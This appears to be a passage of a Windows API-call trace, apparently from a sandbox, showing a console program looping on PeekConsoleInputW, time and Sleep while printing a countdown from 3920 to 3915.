[0164.761] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.761] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0164.761] Sleep (dwMilliseconds=0x64)
[0164.870] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.870] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0164.870] Sleep (dwMilliseconds=0x64)
[0164.987] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.987] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0164.987] Sleep (dwMilliseconds=0x64)
[0165.088] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.088] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0165.088] Sleep (dwMilliseconds=0x64)
[0165.198] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.198] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0165.198] Sleep (dwMilliseconds=0x64)
[0165.307] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.307] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0165.307] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083920") returned 8
[0165.307] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0165.307] __iob_func () returned 0x757a2900
[0165.307] _fileno (_File=0x757a2920) returned 1
[0165.307] _errno () returned 0x5507d8
[0165.307] _get_osfhandle (_FileHandle=1) returned 0x4c
[0165.307] _errno () returned 0x5507d8
[0165.307] GetFileType (hFile=0x4c) returned 0x2
[0165.307] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0165.307] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0165.308] lstrlenW (lpString="\x08\x08\x08\x083920") returned 8
[0165.308] GetConsoleOutputCP () returned 0x1b5
[0165.308] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083920", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0165.308] GetConsoleOutputCP () returned 0x1b5
[0165.308] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083920", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083920", lpUsedDefaultChar=0x0) returned 8
[0165.308] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0165.308] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0165.308] Sleep (dwMilliseconds=0x64)
[0165.416] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.416] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0165.416] Sleep (dwMilliseconds=0x64)
[0165.525] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.525] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0165.525] Sleep (dwMilliseconds=0x64)
[0165.634] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.634] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0165.635] Sleep (dwMilliseconds=0x64)
[0165.743] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.744] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0165.744] Sleep (dwMilliseconds=0x64)
[0165.855] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.855] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0165.855] Sleep (dwMilliseconds=0x64)
[0165.962] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0165.962] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0165.962] Sleep (dwMilliseconds=0x64)
[0166.071] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.071] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0166.071] Sleep (dwMilliseconds=0x64)
[0166.180] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.181] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6001
[0166.181] Sleep (dwMilliseconds=0x64)
[0166.289] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.290] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0166.290] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083919") returned 8
[0166.290] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0166.290] __iob_func () returned 0x757a2900
[0166.290] _fileno (_File=0x757a2920) returned 1
[0166.290] _errno () returned 0x5507d8
[0166.290] _get_osfhandle (_FileHandle=1) returned 0x4c
[0166.290] _errno () returned 0x5507d8
[0166.290] GetFileType (hFile=0x4c) returned 0x2
[0166.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0166.290] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0166.290] lstrlenW (lpString="\x08\x08\x08\x083919") returned 8
[0166.290] GetConsoleOutputCP () returned 0x1b5
[0166.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083919", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0166.290] GetConsoleOutputCP () returned 0x1b5
[0166.291] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083919", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083919", lpUsedDefaultChar=0x0) returned 8
[0166.291] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0166.291] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0166.291] Sleep (dwMilliseconds=0x64)
[0166.399] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.399] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0166.399] Sleep (dwMilliseconds=0x64)
[0166.508] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.508] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0166.508] Sleep (dwMilliseconds=0x64)
[0166.617] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.617] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0166.617] Sleep (dwMilliseconds=0x64)
[0166.726] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.727] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0166.727] Sleep (dwMilliseconds=0x64)
[0166.835] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.836] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0166.836] Sleep (dwMilliseconds=0x64)
[0166.945] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0166.945] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0166.945] Sleep (dwMilliseconds=0x64)
[0167.054] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.054] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0167.054] Sleep (dwMilliseconds=0x64)
[0167.163] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.163] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6002
[0167.163] Sleep (dwMilliseconds=0x64)
[0167.272] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.272] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6003
[0167.272] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083918") returned 8
[0167.272] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0167.272] __iob_func () returned 0x757a2900
[0167.272] _fileno (_File=0x757a2920) returned 1
[0167.272] _errno () returned 0x5507d8
[0167.272] _get_osfhandle (_FileHandle=1) returned 0x4c
[0167.273] _errno () returned 0x5507d8
[0167.273] GetFileType (hFile=0x4c) returned 0x2
[0167.273] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0167.273] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0167.273] lstrlenW (lpString="\x08\x08\x08\x083918") returned 8
[0167.273] GetConsoleOutputCP () returned 0x1b5
[0167.273] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083918", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0167.273] GetConsoleOutputCP () returned 0x1b5
[0167.273] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083918", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083918", lpUsedDefaultChar=0x0) returned 8
[0167.273] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0167.273] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0167.273] Sleep (dwMilliseconds=0x64)
[0167.381] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.382] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6003
[0167.382] Sleep (dwMilliseconds=0x64)
[0167.491] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.491] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6003
[0167.491] Sleep (dwMilliseconds=0x64)
[0167.638] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.638] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6003
[0167.638] Sleep (dwMilliseconds=0x64)
[0167.771] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.771] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6003
[0167.771] Sleep (dwMilliseconds=0x64)
[0167.912] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0167.912] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6003
[0167.912] Sleep (dwMilliseconds=0x64)
[0168.037] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0168.037] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6003
[0168.037] Sleep (dwMilliseconds=0x64)
[0168.224] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0168.224] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6004
[0168.224] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083917") returned 8
[0168.224] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0168.224] __iob_func () returned 0x757a2900
[0168.224] _fileno (_File=0x757a2920) returned 1
[0168.224] _errno () returned 0x5507d8
[0168.224] _get_osfhandle (_FileHandle=1) returned 0x4c
[0168.224] _errno () returned 0x5507d8
[0168.224] GetFileType (hFile=0x4c) returned 0x2
[0168.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0168.224] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0168.224] lstrlenW (lpString="\x08\x08\x08\x083917") returned 8
[0168.225] GetConsoleOutputCP () returned 0x1b5
[0168.225] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083917", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0168.225] GetConsoleOutputCP () returned 0x1b5
[0168.225] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083917", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083917", lpUsedDefaultChar=0x0) returned 8
[0168.225] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0168.225] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0168.225] Sleep (dwMilliseconds=0x64)
[0168.380] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0168.380] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6004
[0168.380] Sleep (dwMilliseconds=0x64)
[0168.568] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0168.568] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6004
[0168.568] Sleep (dwMilliseconds=0x64)
[0168.754] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0168.754] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6004
[0168.754] Sleep (dwMilliseconds=0x64)
[0168.957] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0168.957] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6004
[0168.957] Sleep (dwMilliseconds=0x64)
[0169.144] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0169.144] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6004
[0169.144] Sleep (dwMilliseconds=0x64)
[0169.331] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0169.332] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6005
[0169.332] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083916") returned 8
[0169.332] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0169.332] __iob_func () returned 0x757a2900
[0169.332] _fileno (_File=0x757a2920) returned 1
[0169.332] _errno () returned 0x5507d8
[0169.332] _get_osfhandle (_FileHandle=1) returned 0x4c
[0169.332] _errno () returned 0x5507d8
[0169.332] GetFileType (hFile=0x4c) returned 0x2
[0169.332] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0169.332] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0169.332] lstrlenW (lpString="\x08\x08\x08\x083916") returned 8
[0169.332] GetConsoleOutputCP () returned 0x1b5
[0169.332] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083916", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0169.332] GetConsoleOutputCP () returned 0x1b5
[0169.332] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083916", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083916", lpUsedDefaultChar=0x0) returned 8
[0169.332] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0169.333] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0169.333] Sleep (dwMilliseconds=0x64)
[0169.519] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0169.519] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6005
[0169.519] Sleep (dwMilliseconds=0x64)
[0169.706] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0169.706] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6005
[0169.706] Sleep (dwMilliseconds=0x64)
[0169.885] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0169.886] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6005
[0169.886] Sleep (dwMilliseconds=0x64)
[0170.029] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.029] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6005
[0170.029] Sleep (dwMilliseconds=0x64)
[0170.174] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.174] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6005
[0170.174] Sleep (dwMilliseconds=0x64)
[0170.314] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.314] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0170.314] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083915") returned 8
[0170.314] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0170.314] __iob_func () returned 0x757a2900
[0170.314] _fileno (_File=0x757a2920) returned 1
[0170.315] _errno () returned 0x5507d8
[0170.315] _get_osfhandle (_FileHandle=1) returned 0x4c
[0170.315] _errno () returned 0x5507d8
[0170.315] GetFileType (hFile=0x4c) returned 0x2
[0170.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0170.315] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0170.315] lstrlenW (lpString="\x08\x08\x08\x083915") returned 8
[0170.315] GetConsoleOutputCP () returned 0x1b5
[0170.315] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083915", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0170.315] GetConsoleOutputCP () returned 0x1b5
[0170.315] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083915", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083915", lpUsedDefaultChar=0x0) returned 8
[0170.315] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0170.315] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0170.315] Sleep (dwMilliseconds=0x64)
[0170.455] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.455] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0170.455] Sleep (dwMilliseconds=0x64)
[0170.582] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.582] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0170.582] Sleep (dwMilliseconds=0x64)
[0170.688] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.689] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0170.689] Sleep (dwMilliseconds=0x64)
[0170.798] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.798] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0170.798] Sleep (dwMilliseconds=0x64)
[0170.907] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0170.907] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0170.907] Sleep (dwMilliseconds=0x64)
[0171.016] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.016] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0171.016] Sleep (dwMilliseconds=0x64)
[0171.125] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.125] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6006
[0171.126] Sleep (dwMilliseconds=0x64)
[0171.234] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.235] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
